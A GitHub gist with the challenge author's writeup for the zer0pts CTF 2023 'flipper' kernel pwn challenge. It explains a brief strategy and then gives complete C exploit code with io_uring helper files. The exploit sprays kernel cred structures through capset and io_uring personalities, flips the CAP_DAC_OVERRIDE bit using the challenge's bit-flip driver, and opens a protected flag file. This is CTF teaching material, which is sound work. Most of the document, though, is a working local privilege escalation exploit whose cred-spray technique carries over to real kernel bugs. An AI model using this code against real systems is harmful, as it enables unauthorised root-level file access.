Skip to content

Instantly share code, notes, and snippets.

@leesh3288
Last active July 29, 2023 09:15
Show Gist options
  • Save leesh3288/5306faa8d0e2deeda81608361eb0b2f2 to your computer and use it in GitHub Desktop.
Save leesh3288/5306faa8d0e2deeda81608361eb0b2f2 to your computer and use it in GitHub Desktop.
zer0pts CTF 2023 flipper (pwn) Author's Writeup

zer0pts CTF 2023 flipper (pwn) Author's Writeup

Written by Xion

Challenge Summary

Linux kernel heap-relative 1-bit flip primitive, LPE to read flag.

Author's solution

  1. Spray struct creds via capset + IORING_REGISTER_PERSONALITY1
  2. Use the primitive to flip CAP_DAC_OVERRIDE bit in cap_effective of one of the sprayed creds
    • Offset between allocation and creds are easily and stably guessable
  3. Submit IORING_OP_OPENAT command with each of the registered personality (cred) to override file permissions and open flag.

Other expected solutions

  1. Flip a pointer or refcount for UAF and proceed with heap exploits
    • Most solutions seem to have taken this route, pivoting to further exploitable primitives (especially DirtyCred2)
  2. Flip a bit in length field or equivalent of some data and proceed with heap exploits

Exploit

See exploit.c. io_uring.c/h, cred.c/h, util.h are wrapper functions over io_uring and utilities.

Footnotes

  1. https://org.anize.rs/HITCON-2022/pwn/fourchain-kernel

  2. https://zplin.me/papers/DirtyCred.pdf

#include <unistd.h>
#include <sys/syscall.h>
#include <linux/capability.h>
#include "io_uring.h"
#include "cred.h"
#include "util.h"
void delete_n_creds(int uring_fd, size_t n_creds)
{
for (size_t i = 0; i < n_creds; i++) {
if (syscall(SYS_io_uring_register, uring_fd, IORING_UNREGISTER_PERSONALITY, NULL, i + 1) < 0)
fatal("io_uring_register() failed");
}
}
void alloc_n_creds(int uring_fd, size_t n_creds)
{
for (size_t i = 0; i < n_creds; i++) {
struct __user_cap_header_struct cap_hdr = {
.pid = 0,
.version = _LINUX_CAPABILITY_VERSION_3
};
struct user_cap_data_struct cap_data[2] = {
{.effective = 0, .inheritable = 0, .permitted = 0},
{.effective = 0, .inheritable = 0, .permitted = 0}
};
/* allocate new cred */
if (syscall(SYS_capset, &cap_hdr, (void *)cap_data))
fatal("capset() failed");
/* increment refcount so we don't free it afterwards*/
if (syscall(SYS_io_uring_register, uring_fd, IORING_REGISTER_PERSONALITY, 0, 0) < 0)
fatal("io_uring_register() failed");
}
}
#ifndef CRED_H
#define CRED_H
#include <stdint.h>
struct user_cap_data_struct {
uint32_t effective;
uint32_t permitted;
uint32_t inheritable;
};
void alloc_n_creds(int uring_fd, size_t n_creds);
void delete_n_creds(int uring_fd, size_t n_creds);
#endif // CRED_H
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include "io_uring.h"
#include "cred.h"
#include "util.h"
#define CMD_ALLOC 0x13370000
#define CMD_FLIP 0x13370001
int main(void)
{
int ffd, rootfd;
// 0. prep stuff
if ((ffd = open("/dev/flipper", O_RDONLY)) < 0) {
fatal("[!] open /dev/flipper");
}
if ((rootfd = open("/", O_RDONLY | O_DIRECTORY)) < 0) {
fatal("[!] open /");
}
struct submitter uring_cred;
app_setup_uring(&uring_cred, 0x80);
// 1. prep base alloc
if (ioctl(ffd, CMD_ALLOC, 0xc0)) {
fatal("[!] ioctl CMD_ALLOC");
}
// 2. spray creds
printf("[*] spraying 0xffff creds\n");
alloc_n_creds(uring_cred.ring_fd, 0xffff);
// 3. flip one of the cred's capability
int ofs = (0xffff * 0xc0 / 2) & ~0xfff; // offset into io_uring cred sprays
ofs += 56; // cap_effective @ cred + 56
ofs <<= 3;
ofs += 1; // CAP_DAC_OVERRIDE
printf("[*] flip bit offset: 0x%x\n", ofs);
if (ioctl(ffd, CMD_FLIP, ofs)) {
fatal("[!] ioctl CMD_FLIP");
}
// 4. attempt to open with elevated permissions
struct io_uring_sqe sqe;
memset(&sqe, 0, sizeof(sqe));
sqe.opcode = IORING_OP_OPENAT;
sqe.fd = rootfd;
sqe.addr = (__u64)"flag";
sqe.open_flags = O_RDWR; // we're using CAP_DAC_OVERRIDE, file permissions don't matter
sqe.len = 0;
sqe.file_index = 0;
printf("[*] scan through all creds\n");
int reaped_success = 0, reap_cnt = 0, flag_fd;
for (int i = 0; i < 0xffff && !reaped_success; i++) {
reap_cnt++;
sqe.personality = i + 1;
submit_to_sq(&uring_cred, &sqe, 1, 1);
read_from_cq(&uring_cred, false, &reaped_success, &flag_fd);
}
if (!reaped_success) {
fatal("[!] flag open fail (cred not hit)");
}
printf("[+] flag opened w/ cred 0x%x, flag fd: %d\n", reap_cnt, flag_fd);
// 5. read flag
char buf[0x100];
write(STDIN_FILENO, buf, read(flag_fd, buf, sizeof(buf)));
return 0;
}
/*
* References:
* https://github.com/shuveb/io_uring-by-example/blob/master/02_cat_uring/main.c
* https://unixism.net/loti/low_level.html
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <inttypes.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include "io_uring.h"
#include "util.h"
int io_uring_register(int fd, unsigned int opcode, void *arg,
unsigned int nr_args)
{
return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
}
int io_uring_setup(unsigned int entries, struct io_uring_params *p)
{
return syscall(__NR_io_uring_setup, entries, p);
}
int io_uring_enter(int fd, unsigned int to_submit, unsigned int min_complete,
unsigned int flags)
{
return syscall(__NR_io_uring_enter, fd, to_submit, min_complete,
flags, NULL, 0); // no signals
}
int uring_create_raw(size_t n_sqe, size_t n_cqe)
{
struct io_uring_params p = {
.cq_entries = n_cqe,
.flags = IORING_SETUP_CQSIZE
};
int res = io_uring_setup(n_sqe, &p);
if (res < 0)
fatal("io_uring_setup() failed");
return res;
}
int app_setup_uring(struct submitter *s, unsigned int entries)
{
struct app_io_sq_ring *sring = &s->sq_ring;
struct app_io_cq_ring *cring = &s->cq_ring;
struct io_uring_params p;
void *sq_ptr, *cq_ptr;
/*
* We need to pass in the io_uring_params structure to the io_uring_setup()
* call zeroed out. We could set any flags if we need to, but for this
* example, we don't.
* */
memset(&p, 0, sizeof(p));
//p.flags = IORING_SETUP_SQPOLL;
//p.sq_thread_idle = 1000;
p.wq_fd = -1;
s->ring_fd = io_uring_setup(entries, &p); // SQ/CQ with at least 1 entry
if (s->ring_fd < 0) {
perror("io_uring_setup");
return 1;
}
/*
* io_uring communication happens via 2 shared kernel-user space ring buffers,
* which can be jointly mapped with a single mmap() call in recent kernels.
* While the completion queue is directly manipulated, the submission queue
* has an indirection array in between. We map that in as well.
* */
int sring_sz = p.sq_off.array + p.sq_entries * sizeof(unsigned);
int cring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);
/* In kernel version 5.4 and above, it is possible to map the submission and
* completion buffers with a single mmap() call. Rather than check for kernel
* versions, the recommended way is to just check the features field of the
* io_uring_params structure, which is a bit mask. If the
* IORING_FEAT_SINGLE_MMAP is set, then we can do away with the second mmap()
* call to map the completion ring.
* */
if (p.features & IORING_FEAT_SINGLE_MMAP) {
if (cring_sz > sring_sz) {
sring_sz = cring_sz;
}
cring_sz = sring_sz;
}
/* Map in the submission and completion queue ring buffers.
* Older kernels only map in the submission queue, though.
* */
sq_ptr = mmap(0, sring_sz, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_POPULATE,
s->ring_fd, IORING_OFF_SQ_RING);
if (sq_ptr == MAP_FAILED) {
perror("mmap");
return 1;
}
if (p.features & IORING_FEAT_SINGLE_MMAP) {
cq_ptr = sq_ptr;
} else {
/* Map in the completion queue ring buffer in older kernels separately */
cq_ptr = mmap(0, cring_sz, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_POPULATE,
s->ring_fd, IORING_OFF_CQ_RING);
if (cq_ptr == MAP_FAILED) {
perror("mmap");
return 1;
}
}
/* Save useful fields in a global app_io_sq_ring struct for later
* easy reference */
sring->head = sq_ptr + p.sq_off.head;
sring->tail = sq_ptr + p.sq_off.tail;
sring->ring_mask = sq_ptr + p.sq_off.ring_mask;
sring->ring_entries = sq_ptr + p.sq_off.ring_entries;
sring->flags = sq_ptr + p.sq_off.flags;
sring->array = sq_ptr + p.sq_off.array;
/* Save useful fields in a global app_io_cq_ring struct for later
* easy reference */
cring->head = cq_ptr + p.cq_off.head;
cring->tail = cq_ptr + p.cq_off.tail;
cring->ring_mask = cq_ptr + p.cq_off.ring_mask;
cring->ring_entries = cq_ptr + p.cq_off.ring_entries;
cring->cqes = cq_ptr + p.cq_off.cqes;
/* Map in the submission queue entries array */
s->sqes = mmap(0, p.sq_entries * sizeof(struct io_uring_sqe),
PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
s->ring_fd, IORING_OFF_SQES);
if (s->sqes == MAP_FAILED) {
perror("mmap");
return 1;
}
return 0;
}
void app_debug_print_uring(struct submitter *s)
{
#define PTR_AND_DEREF(ptr) ptr, *(ptr)
printf("struct submitter s = {\n");
printf(" .ring_fd = %d,\n", s->ring_fd);
printf(" .sq_ring = {\n");
printf(" .head = %p -> 0x%x,\n", PTR_AND_DEREF(s->sq_ring.head));
printf(" .tail = %p -> 0x%x,\n", PTR_AND_DEREF(s->sq_ring.tail));
printf(" .ring_mask = %p -> 0x%x,\n", PTR_AND_DEREF(s->sq_ring.ring_mask));
printf(" .ring_entries = %p -> 0x%x,\n", PTR_AND_DEREF(s->sq_ring.ring_entries));
printf(" .flags = %p -> 0x%x,\n", PTR_AND_DEREF(s->sq_ring.flags));
printf(" .array = %p -> 0x%x\n", PTR_AND_DEREF(s->sq_ring.array));
printf(" },\n");
printf(" .cq_ring = {\n");
printf(" .head = %p -> 0x%x,\n", PTR_AND_DEREF(s->cq_ring.head));
printf(" .tail = %p -> 0x%x,\n", PTR_AND_DEREF(s->cq_ring.tail));
printf(" .ring_mask = %p -> 0x%x,\n", PTR_AND_DEREF(s->cq_ring.ring_mask));
printf(" .ring_entries = %p -> 0x%x,\n", PTR_AND_DEREF(s->cq_ring.ring_entries));
printf(" .cqes = %p\n", s->cq_ring.cqes);
printf(" },\n");
printf(" .sqes = %p\n", s->sqes);
printf("}\n");
#undef PTR_AND_DEREF
}
/*
* Read from completion queue.
* In this function, we read completion events from the completion queue, get
* the data buffer that will have the file data and print it to the console.
*
* */
int read_from_cq(struct submitter *s, bool print, int *reaped_success, int *results) {
struct app_io_cq_ring *cring = &s->cq_ring;
struct io_uring_cqe *cqe;
unsigned head, reaped = 0, success = 0;
head = *cring->head;
do {
read_barrier();
/*
* Remember, this is a ring buffer. If head == tail, it means that the
* buffer is empty.
* */
if (head == *cring->tail)
break;
/* Get the entry */
cqe = &cring->cqes[head & *s->cq_ring.ring_mask];
if (print) {
if (cqe->res < 0) {
printf("cqe: res = %d (error: %s), user_data = 0x%llx\n", cqe->res, strerror(abs(cqe->res)), cqe->user_data);
} else {
printf("cqe: res = %d, user_data = 0x%llx\n", cqe->res, cqe->user_data);
}
}
if (cqe->res >= 0) {
success++;
if (results) {
*results++ = cqe->res;
}
}
head++;
reaped++;
} while (1);
*cring->head = head;
write_barrier();
if (reaped_success != NULL) {
*reaped_success = success;
}
return reaped;
}
/*
* Submit to submission queue.
* In this function, we submit requests to the submission queue. You can submit
* many types of requests. Ours is going to be the readv() request, which we
* specify via IORING_OP_READV.
*
* */
int submit_to_sq(struct submitter *s, struct io_uring_sqe *sqes, unsigned int sqe_len, unsigned int min_complete) {
struct app_io_sq_ring *sring = &s->sq_ring;
unsigned index, head, tail, next_tail, mask, to_submit;
/* assume unique submitter, i.e. tail does not change */
next_tail = tail = *sring->tail;
/* Add our submission queue entry to the tail of the SQE ring buffer */
for (to_submit = 0; to_submit < sqe_len; to_submit++) {
read_barrier();
head = *sring->head; // this may change as kernel processes sqe
mask = *s->sq_ring.ring_mask; // ...but does this ever change?
// SQ full (tail wrapped back to head)
if ((head & mask) == (tail & mask) && head != tail) {
break;
}
next_tail++;
index = tail & mask;
struct io_uring_sqe *sqe = &s->sqes[index];
memcpy(sqe, &sqes[to_submit], sizeof(*sqe));
sring->array[index] = index;
tail = next_tail;
}
/* Update the tail so the kernel can see it. */
if(*sring->tail != tail) {
*sring->tail = tail;
write_barrier();
}
/*
* Tell the kernel we have submitted events with the io_uring_enter() system
* call. We also pass in the IOURING_ENTER_GETEVENTS flag which causes the
* io_uring_enter() call to wait until min_complete events (the 3rd param)
* complete.
* */
int ret = io_uring_enter(s->ring_fd, to_submit, min_complete, IORING_ENTER_GETEVENTS);
if(ret < 0) {
perror("io_uring_enter");
return ret;
}
//io_uring_enter(s->ring_fd, 0, 0, IORING_ENTER_SQ_WAKEUP);
return to_submit;
}
#ifndef IO_URING_H
#define IO_URING_H
#include <stdint.h>
#include <signal.h>
#include <stdbool.h>
#define __NR_io_uring_setup 425
#define __NR_io_uring_enter 426
#define __NR_io_uring_register 427
#define read_barrier() __asm__ __volatile__("":::"memory")
#define write_barrier() __asm__ __volatile__("":::"memory")
typedef uint8_t __u8;
typedef uint16_t __u16;
typedef uint32_t __u32;
typedef unsigned long long __u64;
typedef int8_t __s8;
typedef int16_t __s16;
typedef int32_t __s32;
typedef long long __s64;
typedef int __kernel_rwf_t;
#define __aligned_u64 __u64 __attribute__((aligned(8)))
#define __aligned_be64 __be64 __attribute__((aligned(8)))
#define __aligned_le64 __le64 __attribute__((aligned(8)))
/*
* IO submission data structure (Submission Queue Entry)
*/
struct io_uring_sqe {
__u8 opcode; /* type of operation for this sqe */
__u8 flags; /* IOSQE_ flags */
__u16 ioprio; /* ioprio for the request */
__s32 fd; /* file descriptor to do IO on */
union {
__u64 off; /* offset into file */
__u64 addr2;
};
union {
__u64 addr; /* pointer to buffer or iovecs */
__u64 splice_off_in;
};
__u32 len; /* buffer size or number of iovecs */
union {
__kernel_rwf_t rw_flags;
__u32 fsync_flags;
__u16 poll_events; /* compatibility */
__u32 poll32_events; /* word-reversed for BE */
__u32 sync_range_flags;
__u32 msg_flags;
__u32 timeout_flags;
__u32 accept_flags;
__u32 cancel_flags;
__u32 open_flags;
__u32 statx_flags;
__u32 fadvise_advice;
__u32 splice_flags;
__u32 rename_flags;
__u32 unlink_flags;
__u32 hardlink_flags;
};
__u64 user_data; /* data to be passed back at completion time */
/* pack this to avoid bogus arm OABI complaints */
union {
/* index into fixed buffers, if used */
__u16 buf_index;
/* for grouped buffer selection */
__u16 buf_group;
} __attribute__((packed));
/* personality to use, if used */
__u16 personality;
union {
__s32 splice_fd_in;
__u32 file_index;
};
__u64 __pad2[2];
};
enum {
IOSQE_FIXED_FILE_BIT,
IOSQE_IO_DRAIN_BIT,
IOSQE_IO_LINK_BIT,
IOSQE_IO_HARDLINK_BIT,
IOSQE_ASYNC_BIT,
IOSQE_BUFFER_SELECT_BIT,
};
/*
* sqe->flags
*/
/* use fixed fileset */
#define IOSQE_FIXED_FILE (1U << IOSQE_FIXED_FILE_BIT)
/* issue after inflight IO */
#define IOSQE_IO_DRAIN (1U << IOSQE_IO_DRAIN_BIT)
/* links next sqe */
#define IOSQE_IO_LINK (1U << IOSQE_IO_LINK_BIT)
/* like LINK, but stronger */
#define IOSQE_IO_HARDLINK (1U << IOSQE_IO_HARDLINK_BIT)
/* always go async */
#define IOSQE_ASYNC (1U << IOSQE_ASYNC_BIT)
/* select buffer from sqe->buf_group */
#define IOSQE_BUFFER_SELECT (1U << IOSQE_BUFFER_SELECT_BIT)
/*
* io_uring_setup() flags
*/
#define IORING_SETUP_IOPOLL (1U << 0) /* io_context is polled */
#define IORING_SETUP_SQPOLL (1U << 1) /* SQ poll thread */
#define IORING_SETUP_SQ_AFF (1U << 2) /* sq_thread_cpu is valid */
#define IORING_SETUP_CQSIZE (1U << 3) /* app defines CQ size */
#define IORING_SETUP_CLAMP (1U << 4) /* clamp SQ/CQ ring sizes */
#define IORING_SETUP_ATTACH_WQ (1U << 5) /* attach to existing wq */
#define IORING_SETUP_R_DISABLED (1U << 6) /* start with ring disabled */
enum {
IORING_OP_NOP,
IORING_OP_READV,
IORING_OP_WRITEV,
IORING_OP_FSYNC,
IORING_OP_READ_FIXED,
IORING_OP_WRITE_FIXED,
IORING_OP_POLL_ADD,
IORING_OP_POLL_REMOVE,
IORING_OP_SYNC_FILE_RANGE,
IORING_OP_SENDMSG,
IORING_OP_RECVMSG,
IORING_OP_TIMEOUT,
IORING_OP_TIMEOUT_REMOVE,
IORING_OP_ACCEPT,
IORING_OP_ASYNC_CANCEL,
IORING_OP_LINK_TIMEOUT,
IORING_OP_CONNECT,
IORING_OP_FALLOCATE,
IORING_OP_OPENAT,
IORING_OP_CLOSE,
IORING_OP_FILES_UPDATE,
IORING_OP_STATX,
IORING_OP_READ,
IORING_OP_WRITE,
IORING_OP_FADVISE,
IORING_OP_MADVISE,
IORING_OP_SEND,
IORING_OP_RECV,
IORING_OP_OPENAT2,
IORING_OP_EPOLL_CTL,
IORING_OP_SPLICE,
IORING_OP_PROVIDE_BUFFERS,
IORING_OP_REMOVE_BUFFERS,
IORING_OP_TEE,
IORING_OP_SHUTDOWN,
IORING_OP_RENAMEAT,
IORING_OP_UNLINKAT,
IORING_OP_MKDIRAT,
IORING_OP_SYMLINKAT,
IORING_OP_LINKAT,
/* this goes last, obviously */
IORING_OP_LAST,
};
/*
* sqe->fsync_flags
*/
#define IORING_FSYNC_DATASYNC (1U << 0)
/*
* sqe->timeout_flags
*/
#define IORING_TIMEOUT_ABS (1U << 0)
#define IORING_TIMEOUT_UPDATE (1U << 1)
#define IORING_TIMEOUT_BOOTTIME (1U << 2)
#define IORING_TIMEOUT_REALTIME (1U << 3)
#define IORING_LINK_TIMEOUT_UPDATE (1U << 4)
#define IORING_TIMEOUT_CLOCK_MASK (IORING_TIMEOUT_BOOTTIME | IORING_TIMEOUT_REALTIME)
#define IORING_TIMEOUT_UPDATE_MASK (IORING_TIMEOUT_UPDATE | IORING_LINK_TIMEOUT_UPDATE)
/*
* sqe->splice_flags
* extends splice(2) flags
*/
#define SPLICE_F_FD_IN_FIXED (1U << 31) /* the last bit of __u32 */
/*
* POLL_ADD flags. Note that since sqe->poll_events is the flag space, the
* command flags for POLL_ADD are stored in sqe->len.
*
* IORING_POLL_ADD_MULTI Multishot poll. Sets IORING_CQE_F_MORE if
* the poll handler will continue to report
* CQEs on behalf of the same SQE.
*
* IORING_POLL_UPDATE Update existing poll request, matching
* sqe->addr as the old user_data field.
*/
#define IORING_POLL_ADD_MULTI (1U << 0)
#define IORING_POLL_UPDATE_EVENTS (1U << 1)
#define IORING_POLL_UPDATE_USER_DATA (1U << 2)
/*
* IO completion data structure (Completion Queue Entry)
*/
struct io_uring_cqe {
__u64 user_data; /* sqe->data submission passed back */
__s32 res; /* result code for this event */
__u32 flags;
};
/*
* cqe->flags
*
* IORING_CQE_F_BUFFER If set, the upper 16 bits are the buffer ID
* IORING_CQE_F_MORE If set, parent SQE will generate more CQE entries
*/
#define IORING_CQE_F_BUFFER (1U << 0)
#define IORING_CQE_F_MORE (1U << 1)
enum {
IORING_CQE_BUFFER_SHIFT = 16,
};
/*
* Magic offsets for the application to mmap the data it needs
*/
#define IORING_OFF_SQ_RING 0ULL
#define IORING_OFF_CQ_RING 0x8000000ULL
#define IORING_OFF_SQES 0x10000000ULL
/*
* Filled with the offset for mmap(2)
*/
struct io_sqring_offsets {
__u32 head;
__u32 tail;
__u32 ring_mask;
__u32 ring_entries;
__u32 flags;
__u32 dropped;
__u32 array;
__u32 resv1;
__u64 resv2;
};
/*
* sq_ring->flags
*/
#define IORING_SQ_NEED_WAKEUP (1U << 0) /* needs io_uring_enter wakeup */
#define IORING_SQ_CQ_OVERFLOW (1U << 1) /* CQ ring is overflown */
struct io_cqring_offsets {
__u32 head;
__u32 tail;
__u32 ring_mask;
__u32 ring_entries;
__u32 overflow;
__u32 cqes;
__u32 flags;
__u32 resv1;
__u64 resv2;
};
/*
* cq_ring->flags
*/
/* disable eventfd notifications */
#define IORING_CQ_EVENTFD_DISABLED (1U << 0)
/*
* io_uring_enter(2) flags
*/
#define IORING_ENTER_GETEVENTS (1U << 0)
#define IORING_ENTER_SQ_WAKEUP (1U << 1)
#define IORING_ENTER_SQ_WAIT (1U << 2)
#define IORING_ENTER_EXT_ARG (1U << 3)
/*
* Passed in for io_uring_setup(2). Copied back with updated info on success
*/
struct io_uring_params {
__u32 sq_entries;
__u32 cq_entries;
__u32 flags;
__u32 sq_thread_cpu;
__u32 sq_thread_idle;
__u32 features;
__u32 wq_fd;
__u32 resv[3];
struct io_sqring_offsets sq_off;
struct io_cqring_offsets cq_off;
};
/*
* io_uring_params->features flags
*/
#define IORING_FEAT_SINGLE_MMAP (1U << 0)
#define IORING_FEAT_NODROP (1U << 1)
#define IORING_FEAT_SUBMIT_STABLE (1U << 2)
#define IORING_FEAT_RW_CUR_POS (1U << 3)
#define IORING_FEAT_CUR_PERSONALITY (1U << 4)
#define IORING_FEAT_FAST_POLL (1U << 5)
#define IORING_FEAT_POLL_32BITS (1U << 6)
#define IORING_FEAT_SQPOLL_NONFIXED (1U << 7)
#define IORING_FEAT_EXT_ARG (1U << 8)
#define IORING_FEAT_NATIVE_WORKERS (1U << 9)
#define IORING_FEAT_RSRC_TAGS (1U << 10)
/*
* io_uring_register(2) opcodes and arguments
*/
enum {
IORING_REGISTER_BUFFERS = 0,
IORING_UNREGISTER_BUFFERS = 1,
IORING_REGISTER_FILES = 2,
IORING_UNREGISTER_FILES = 3,
IORING_REGISTER_EVENTFD = 4,
IORING_UNREGISTER_EVENTFD = 5,
IORING_REGISTER_FILES_UPDATE = 6,
IORING_REGISTER_EVENTFD_ASYNC = 7,
IORING_REGISTER_PROBE = 8,
IORING_REGISTER_PERSONALITY = 9,
IORING_UNREGISTER_PERSONALITY = 10,
IORING_REGISTER_RESTRICTIONS = 11,
IORING_REGISTER_ENABLE_RINGS = 12,
/* extended with tagging */
IORING_REGISTER_FILES2 = 13,
IORING_REGISTER_FILES_UPDATE2 = 14,
IORING_REGISTER_BUFFERS2 = 15,
IORING_REGISTER_BUFFERS_UPDATE = 16,
/* set/clear io-wq thread affinities */
IORING_REGISTER_IOWQ_AFF = 17,
IORING_UNREGISTER_IOWQ_AFF = 18,
/* set/get max number of io-wq workers */
IORING_REGISTER_IOWQ_MAX_WORKERS = 19,
/* this goes last */
IORING_REGISTER_LAST
};
/* io-wq worker categories */
enum {
IO_WQ_BOUND,
IO_WQ_UNBOUND,
};
/* deprecated, see struct io_uring_rsrc_update */
struct io_uring_files_update {
__u32 offset;
__u32 resv;
__aligned_u64 /* __s32 * */ fds;
};
struct io_uring_rsrc_register {
__u32 nr;
__u32 resv;
__u64 resv2;
__aligned_u64 data;
__aligned_u64 tags;
};
struct io_uring_rsrc_update {
__u32 offset;
__u32 resv;
__aligned_u64 data;
};
struct io_uring_rsrc_update2 {
__u32 offset;
__u32 resv;
__aligned_u64 data;
__aligned_u64 tags;
__u32 nr;
__u32 resv2;
};
/* Skip updating fd indexes set to this value in the fd table */
#define IORING_REGISTER_FILES_SKIP (-2)
#define IO_URING_OP_SUPPORTED (1U << 0)
struct io_uring_probe_op {
__u8 op;
__u8 resv;
__u16 flags; /* IO_URING_OP_* flags */
__u32 resv2;
};
struct io_uring_probe {
__u8 last_op; /* last opcode supported */
__u8 ops_len; /* length of ops[] array below */
__u16 resv;
__u32 resv2[3];
struct io_uring_probe_op ops[0];
};
struct io_uring_restriction {
__u16 opcode;
union {
__u8 register_op; /* IORING_RESTRICTION_REGISTER_OP */
__u8 sqe_op; /* IORING_RESTRICTION_SQE_OP */
__u8 sqe_flags; /* IORING_RESTRICTION_SQE_FLAGS_* */
};
__u8 resv;
__u32 resv2[3];
};
/*
* io_uring_restriction->opcode values
*/
enum {
/* Allow an io_uring_register(2) opcode */
IORING_RESTRICTION_REGISTER_OP = 0,
/* Allow an sqe opcode */
IORING_RESTRICTION_SQE_OP = 1,
/* Allow sqe flags */
IORING_RESTRICTION_SQE_FLAGS_ALLOWED = 2,
/* Require sqe flags (these flags must be set on each submission) */
IORING_RESTRICTION_SQE_FLAGS_REQUIRED = 3,
IORING_RESTRICTION_LAST
};
struct io_uring_getevents_arg {
__u64 sigmask;
__u32 sigmask_sz;
__u32 pad;
__u64 ts;
};
/*
* Application-level struct
*/
struct app_io_sq_ring {
unsigned *head;
unsigned *tail;
unsigned *ring_mask;
unsigned *ring_entries;
unsigned *flags;
unsigned *array;
};
struct app_io_cq_ring {
unsigned *head;
unsigned *tail;
unsigned *ring_mask;
unsigned *ring_entries;
struct io_uring_cqe *cqes;
};
struct submitter {
int ring_fd;
struct app_io_sq_ring sq_ring;
struct app_io_cq_ring cq_ring;
struct io_uring_sqe *sqes;
};
int io_uring_register(int fd, unsigned int opcode, void *arg,
unsigned int nr_args);
int io_uring_setup(unsigned int entries, struct io_uring_params *p);
int io_uring_enter(int fd, unsigned int to_submit, unsigned int min_complete,
unsigned int flags);
int uring_create_raw(size_t n_sqe, size_t n_cqe);
int app_setup_uring(struct submitter *s, unsigned int entries);
void app_debug_print_uring(struct submitter *s);
int read_from_cq(struct submitter *s, bool print, int *reaped_success, int *results);
int submit_to_sq(struct submitter *s, struct io_uring_sqe *sqes, unsigned int sqe_len, unsigned int min_complete);
#endif // IO_URING_H
#ifndef UTIL_H
#define UTIL_H
#include <stdio.h>
#include <stdlib.h>
#include <stdnoreturn.h>
static noreturn void fatal(const char *msg)
{
perror(msg);
exit(EXIT_FAILURE);
}
#endif // UTIL_H
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment